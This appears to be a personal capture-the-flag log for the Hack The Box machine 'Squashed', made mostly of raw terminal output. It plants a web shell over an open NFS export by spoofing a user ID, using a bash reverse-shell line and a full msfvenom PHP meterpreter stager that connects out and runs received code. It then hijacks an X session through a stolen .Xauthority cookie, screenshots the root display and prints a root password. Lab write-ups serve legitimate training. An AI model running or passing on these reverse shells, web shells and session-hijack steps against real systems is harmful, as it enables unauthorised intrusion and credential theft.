# https://app.hackthebox.com/machines/Squashed
2023-04-09



info collecting

└─$ sudo nmap -A -T4                                                                                                                                           1 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 16:11 HKT
Nmap scan report for (
Host is up (0.62s latency).
Not shown: 996 closed tcp ports (reset)
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      41171/tcp   mountd
|   100005  1,2,3      49582/udp   mountd
|   100005  1,2,3      52017/tcp6  mountd
|   100005  1,2,3      52270/udp6  mountd
|   100021  1,3,4      40811/tcp   nlockmgr
|   100021  1,3,4      45367/tcp6  nlockmgr
|   100021  1,3,4      46131/udp6  nlockmgr
|   100021  1,3,4      47277/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp open  nfs_acl 3 (RPC #100227)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
1   577.95 ms (
2   291.62 ms (

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.11 seconds

nmap --script=nfs-*
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 22:11 HKT
Nmap scan report for (
Host is up (0.74s latency).
Not shown: 996 closed tcp ports (conn-refused)
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
| nfs-showmount: 
|   /home/ross *
|_  /var/www/html *
2049/tcp open  nfs

Nmap done: 1 IP address (1 host up) scanned in 122.08 seconds


mount nfs

└─$                                                                                                                                                                       100 ⨯
└─$ showmount -e
Export list for
/home/ross    *
/var/www/html *

└─$ showmount --all
All mount points on
└─$ showmount --exports
Export list for
/home/ross    *
/var/www/html *

└─$ sudo mount -t nfs /home/kwkl/HODL/htb/squashed/ross -o nolock                                                                                  32 ⨯
[sudo] kwkl 的密码:

└─$ sudo mount -t nfs /home/kwkl/HODL/htb/squashed/html -o nolock


└─$ ls -al ross
总用量 68
drwxr-xr-x 14 1001 1001 4096  4月  7 13:20 .
drwxr-xr-x  5 kwkl kwkl 4096  4月  8 22:23 ..
lrwxrwxrwx  1 root root    9 10月 20 21:24 .bash_history -> /dev/null
drwx------ 11 1001 1001 4096 10月 21 22:57 .cache
drwx------ 12 1001 1001 4096 10月 21 22:57 .config
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Desktop
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Documents
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Downloads
drwx------  3 1001 1001 4096 10月 21 22:57 .gnupg
drwx------  3 1001 1001 4096 10月 21 22:57 .local
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Music
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Pictures
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Public
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Templates
drwxr-xr-x  2 1001 1001 4096 10月 21 22:57 Videos
lrwxrwxrwx  1 root root    9 10月 21 21:07 .viminfo -> /dev/null
-rw-------  1 1001 1001   57  4月  7 13:20 .Xauthority
-rw-------  1 1001 1001 2475  4月  7 13:20 .xsession-errors
-rw-------  1 1001 1001 2475 12月 27 23:33 .xsession-errors.old

└─$ ls -al webhtml
ls: 无法访问 'webhtml/.': 权限不够
ls: 无法访问 'webhtml/..': 权限不够
ls: 无法访问 'webhtml/.htaccess': 权限不够
ls: 无法访问 'webhtml/index.html': 权限不够
ls: 无法访问 'webhtml/images': 权限不够
ls: 无法访问 'webhtml/css': 权限不够
ls: 无法访问 'webhtml/js': 权限不够
总用量 0
d????????? ? ? ? ?             ? .
d????????? ? ? ? ?             ? ..
?????????? ? ? ? ?             ? css
?????????? ? ? ? ?             ? .htaccess
?????????? ? ? ? ?             ? images
?????????? ? ? ? ?             ? index.html
?????????? ? ? ? ?             ? js

└─$ ls -ld webhtml                                                                                                                                                          1 ⨯
drwxr-xr-- 5 2017 www-data 4096  4月  8 22:40 webhtml
└─$ sudo useradd webuser                                                                                                  
└─$ sudo usermod -u 2017 webuser              
└─$ sudo passwd webuser                                                                                                                                                     1 ⨯
新的 密码:
重新输入新的 密码:
└─$ su webuser         
$ ls -al webhtml
总用量 56
drwxr-xr-- 5 webuser www-data  4096  4月  8 22:45 .
drwxr-xr-x 6 kwkl    kwkl      4096  4月  8 22:42 ..
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 css
-rw-r--r-- 1 webuser www-data    44 10月 21 18:30 .htaccess
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 images
-rw-r----- 1 webuser www-data 32532  4月  8 22:45 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 js
$ cd webhtml

create user

└─$ ls -ld webhtml                                                                                                                                                          1 ⨯
drwxr-xr-- 5 2017 www-data 4096  4月  8 22:40 webhtml
└─$ sudo useradd webuser                                                                                                  
└─$ sudo usermod -u 2017 webuser              
└─$ sudo passwd webuser                                                                                                                                                     1 ⨯
新的 密码:
重新输入新的 密码:
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=5555 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1112 bytes
Saved as: shell.php

└─$ su webuser         
$ ls -al webhtml
总用量 56
drwxr-xr-- 5 webuser www-data  4096  4月  8 22:45 .
drwxr-xr-x 6 kwkl    kwkl      4096  4月  8 22:42 ..
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 css
-rw-r--r-- 1 webuser www-data    44 10月 21 18:30 .htaccess
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 images
-rw-r----- 1 webuser www-data 32532  4月  8 22:45 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:45 js
$ cd webhtml
$ ls
css  images  index.html  js
$ cat <?php system("bash -c 'bash -i >& /dev/tcp/ 0>&1'");?> >> 1.php
sh: 4: Syntax error: "(" unexpected
$ echo "<?php system("bash -c 'bash -i >& /dev/tcp/ 0>&1'");?>" >> 1.php
$ ls
1.php  css  images  index.html  js
$ cat 1.php
<?php system(bash -c bash -i >& /dev/tcp/ 0>&1);?>
$ ls
1.php  css  images  index.html  js
$ ls -al
总用量 60
drwxr-xr-- 5 webuser www-data  4096  4月  8 22:53 .
drwxr-xr-x 6 kwkl    kwkl      4096  4月  8 22:42 ..
-rw-r--r-- 1 webuser webuser     67  4月  8 22:53 1.php
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 css
-rw-r--r-- 1 webuser www-data    44 10月 21 18:30 .htaccess
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 images
-rw-r----- 1 webuser www-data 32532  4月  8 22:50 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 js
$ ls -ld *
-rw-r--r-- 1 webuser webuser     67  4月  8 22:53 1.php
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 css
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 images
-rw-r----- 1 webuser www-data 32532  4月  8 22:50 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 js
$ chmod 755 1.php
$ ls -al
总用量 60
drwxr-xr-- 5 webuser www-data  4096  4月  8 22:53 .
drwxr-xr-x 6 kwkl    kwkl      4096  4月  8 22:42 ..
-rwxr-xr-x 1 webuser webuser     67  4月  8 22:53 1.php
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 css
-rw-r--r-- 1 webuser www-data    44 10月 21 18:30 .htaccess
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 images
-rw-r----- 1 webuser www-data 32532  4月  8 22:50 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 22:50 js
$ cat ../shell.php >> 2.php
$ cat 2.php
/*<?php /**/ error_reporting(0); $ip = ''; $port = 5555; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();$ 
$ chmod +x 2.php
$ ls -al      
总用量 56
drwxr-xr-- 5 webuser www-data  4096  4月  8 23:00 .
drwxr-xr-x 6 kwkl    kwkl      4096  4月  8 22:57 ..
drwxr-xr-x 2 webuser www-data  4096  4月  8 23:00 css
-rw-r--r-- 1 webuser www-data    44 10月 21 18:30 .htaccess
drwxr-xr-x 2 webuser www-data  4096  4月  8 23:00 images
-rw-r----- 1 webuser www-data 32532  4月  8 23:00 index.html
drwxr-xr-x 2 webuser www-data  4096  4月  8 23:00 js
$ cat ../shell.php >> 2.php
$ webuser


bash -i >& /dev/tcp/ 0>&1

<?php system("bash -c 'bash -i >& /dev/tcp/ 0>&1'");?>

browser 2.php


└─$ msfconsole                                                                       
[!] The following modules were loaded with warnings:
└─$ msfconsole
       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2266 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View all productivity tips with the 
tips command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > use payload php/meterpreter/reverse_tcp 

Matching Modules

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  payload/php/meterpreter/reverse_tcp                        normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   1  payload/php/meterpreter/reverse_tcp_uuid                   normal  No     PHP Meterpreter, PHP Reverse TCP Stager

Interact with a module by name or index. For example info 1, use 1 or use payload/php/meterpreter/reverse_tcp_uuid

msf6 exploit(multi/handler) > use 0
msf6 payload(php/meterpreter/reverse_tcp) > show options

Module options (payload/php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

View the full module info with the info, or info -d command.

msf6 payload(php/meterpreter/reverse_tcp) > set lhost
lhost =>
msf6 payload(php/meterpreter/reverse_tcp) > set lport 5555
lport => 5555
msf6 payload(php/meterpreter/reverse_tcp) > 
msf6 payload(php/meterpreter/reverse_tcp) > run
[-] Unknown command: run
msf6 payload(php/meterpreter/reverse_tcp) > exploit
[-] Unknown command: exploit
msf6 payload(php/meterpreter/reverse_tcp) > run
[-] Unknown command: run
msf6 payload(php/meterpreter/reverse_tcp) > exploit
[-] Unknown command: exploit
msf6 payload(php/meterpreter/reverse_tcp) > 
msf6 payload(php/meterpreter/reverse_tcp) > 
msf6 payload(php/meterpreter/reverse_tcp) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp 
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost
lhost =>
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 
[*] Sending stage (39927 bytes) to
[*] Meterpreter session 1 opened ( -> at 2023-04-08 23:04:26 +0800

meterpreter > sysinfo
Computer    : squashed.htb
OS          : Linux squashed.htb 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Meterpreter : php/linux
meterpreter > user
[-] Unknown command: user
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 44331 created.
Channel 0 created.
uid=2017(alex) gid=2017(alex) groups=2017(Alex)
cd /home/Alex
cat user.txt

create user ross

$ ls -ld ../ross
drwxr-xr-x 14 1001 webuser 4096  4月  7 13:20 ../ross

└─$ sudo useradd ross        
└─$ sudo usermod -u 1001  ross 
└─$ passwd ross
passwd:您不能查看或更改 ross 的密码信息。
└─$ sudo ross                                                                                                                                                             1 ⨯
sudo: ross:找不到命令
└─$ sudo passwd ross                                                                                                                                                      1 ⨯
新的 密码:
重新输入新的 密码:

su ross

└─$ su ross  
$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
$ tree -a

$ ls -al
总用量 68
drwxr-xr-x 14 ross webuser 4096  4月  7 13:20 .
drwxr-xr-x  6 kwkl kwkl    4096  4月  8 23:11 ..
lrwxrwxrwx  1 root root       9 10月 20 21:24 .bash_history -> /dev/null
drwx------ 11 ross webuser 4096 10月 21 22:57 .cache
drwx------ 12 ross webuser 4096 10月 21 22:57 .config
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Desktop
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Documents
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Downloads
drwx------  3 ross webuser 4096 10月 21 22:57 .gnupg
drwx------  3 ross webuser 4096 10月 21 22:57 .local
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Music
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Pictures
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Public
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Templates
drwxr-xr-x  2 ross webuser 4096 10月 21 22:57 Videos
lrwxrwxrwx  1 root root       9 10月 21 21:07 .viminfo -> /dev/null
-rw-------  1 ross webuser   57  4月  7 13:20 .Xauthority
-rw-------  1 ross webuser 2475  4月  7 13:20 .xsession-errors
-rw-------  1 ross webuser 2475 12月 27 23:33 .xsession-errors.old
$ cp .Xauthority
cp: 在'.Xauthority' 后缺少了要操作的目标文件
请尝试执行 "cp --help" 来获取更多信息。
$ cp .Xauthority
cp: 在'.Xauthority' 后缺少了要操作的目标文件
请尝试执行 "cp --help" 来获取更多信息。
$ cp .Xauthority /tmp
└─$ sudo cp  /tmp/.Xauthority ./                                                                                                                                          1 ⨯
└─$ ls
html  htnl  keepass.hash  Passwords.kdbx  ross  shell.php  webhtml
└─$ ls                    
html  htnl  keepass.hash  Passwords.kdbx  ross  shell.php  webhtml
└─$ ls -al    
总用量 36
drwxr-xr-x  6 kwkl    kwkl     4096  4月  8 23:50 .
drwxr-xr-x 14 kwkl    kwkl     4096  4月  8 22:12 ..
drwxr-xr-x 14 ross    webuser  4096  4月  7 13:20 html
drwxr-xr-x  2 kwkl    kwkl     4096  4月  8 22:23 htnl
-rw-r--r--  1 kwkl    kwkl        0  4月  8 23:41 keepass.hash
-rw-r--r--  1 kwkl    kwkl     1365  4月  8 23:11 Passwords.kdbx
drwxr-xr-x 14 ross    webuser  4096  4月  7 13:20 ross
-rwxrwxrwx  1 kwkl    kwkl     1112  4月  8 22:57 shell.php
drwxr-xr--  5 webuser www-data 4096  4月  8 23:50 webhtml
-rw-------  1 root    root       57  4月  8 23:50 .Xauthority
└─$ chmod 777 .Xauthority 
chmod: 正在更改 '.Xauthority' 的权限: 不允许的操作
└─$ ls                                                                                                                                                                    1 ⨯
html  htnl  keepass.hash  Passwords.kdbx  ross  shell.php  webhtml
└─$ sudo chmod 777 .Xauthority
└─$ ls -al
总用量 36
drwxr-xr-x  6 kwkl    kwkl     4096  4月  8 23:50 .
drwxr-xr-x 14 kwkl    kwkl     4096  4月  8 22:12 ..
drwxr-xr-x 14 ross    webuser  4096  4月  7 13:20 html
drwxr-xr-x  2 kwkl    kwkl     4096  4月  8 22:23 htnl
-rw-r--r--  1 kwkl    kwkl        0  4月  8 23:41 keepass.hash
-rw-r--r--  1 kwkl    kwkl     1365  4月  8 23:11 Passwords.kdbx
drwxr-xr-x 14 ross    webuser  4096  4月  7 13:20 ross
-rwxrwxrwx  1 kwkl    kwkl     1112  4月  8 22:57 shell.php
drwxr-xr--  5 webuser www-data 4096  4月  8 23:50 webhtml
-rwxrwxrwx  1 root    root       57  4月  8 23:50 .Xauthority
└─$ python3 -m http.server 3333
Serving HTTP on port 3333 ( ... - - [08/Apr/2023 23:51:35] "GET / HTTP/1.1" 200 - - - [08/Apr/2023 23:51:35] code 404, message File not found - - [08/Apr/2023 23:51:35] "GET /favicon.ico HTTP/1.1" 404 - - - [08/Apr/2023 23:51:38] "GET /.Xauthority HTTP/1.1" 200 - - - [08/Apr/2023 23:53:42] "GET /.Xauthority HTTP/1.1" 200 -

squash wget the .Xauthority

cd /home/Alex
ls -al
total 80
drwxr-xr-x 15 alex alex  4096 Apr  8 08:45 .
drwxr-xr-x  4 root root  4096 Oct 21 14:57 ..
-rw-rw-rw-  1 alex alex    57 Apr  8 08:27 .Xauthority
lrwxrwxrwx  1 root root     9 Oct 17 13:23 .bash_history -> /dev/null
drwxr-xr-x  8 alex alex  4096 Oct 21 14:57 .cache
drwx------  8 alex alex  4096 Oct 21 14:57 .config
drwx------  3 alex alex  4096 Apr  7 07:58 .gnupg
drwx------  3 alex alex  4096 Oct 21 14:57 .local
-rw-------  1 alex alex 12288 Apr  8 08:05 .swp
lrwxrwxrwx  1 root root     9 Oct 21 13:06 .viminfo -> /dev/null
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Desktop
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Documents
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Downloads
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Music
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Pictures
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Public
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Templates
drwxr-xr-x  2 alex alex  4096 Oct 21 14:57 Videos
drwx------  3 alex alex  4096 Oct 21 14:57 snap
-rw-r-----  1 root alex    33 Apr  7 05:21 user.txt
wget -O /tmp/.Xauthority
--2023-04-08 15:53:45--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 57 [application/octet-stream]
Saving to: '/tmp/.Xauthority'

     0K                                                       100% 8.11M=0s

2023-04-08 15:53:46 (8.11 MB/s) - '/tmp/.Xauthority' saved [57/57]

Get the root's desktop pic

ls /tmp
^[[A^[[D    : not found
/bin/sh: 11: 
ls -al /tmp
total 7600
drwxrwxrwt  3 root root    4096 Apr  8 09:12 .
drwxr-xr-x 20 root root    4096 Oct 21 14:57 ..
-rw-rw-rw-  1 alex alex      57 Apr  8 15:50 .Xauthority
-rw-rw-rw-  1 alex alex 1923179 Apr  8 09:12 0xdf.xwd
-rw-rw-rw-  1 alex alex    2434 Apr  7 07:58 CVE-2021-3560.py
-rw-rw-rw-  1 alex alex  828087 Jan  8 04:26 linpeas.sh
-rwxrwxrwx  1 alex alex 3078592 Dec  6  2021 pspy64
-rw-r--r--  1 alex alex 1923179 Apr  7 08:23 screenshot.xwd
drwx------  2 alex alex    4096 Apr  7 07:58 tmux-2017
XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/haha.xwd    
ls /tmp
ls /tmp
cp haha.xwd /var/www/html
cp: cannot stat 'haha.xwd': No such file or directory
chmod 777 /var/www/html/haha.xwd
ls /var/www/html
ls /var/www/html

Wget the haha.xwd

└─$ wget               
--2023-04-08 23:57:11--
正在连接 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:1923179 (1.8M) [image/x-xwindowdump]
正在保存至: “haha.xwd”

haha.xwd                                    100%[=========================================================================================>]   1.83M  21.7KB/s  用时 3m 4s   

2023-04-09 00:00:44 (10.2 KB/s) - 已保存 “haha.xwd” [1923179/1923179])


su root & get the flag

su root
Password: cah$mei7rai9A
uid=0(root) gid=0(root) groups=0(root)
cat root.txt

[*] - Meterpreter session 1 closed.  Reason: Died


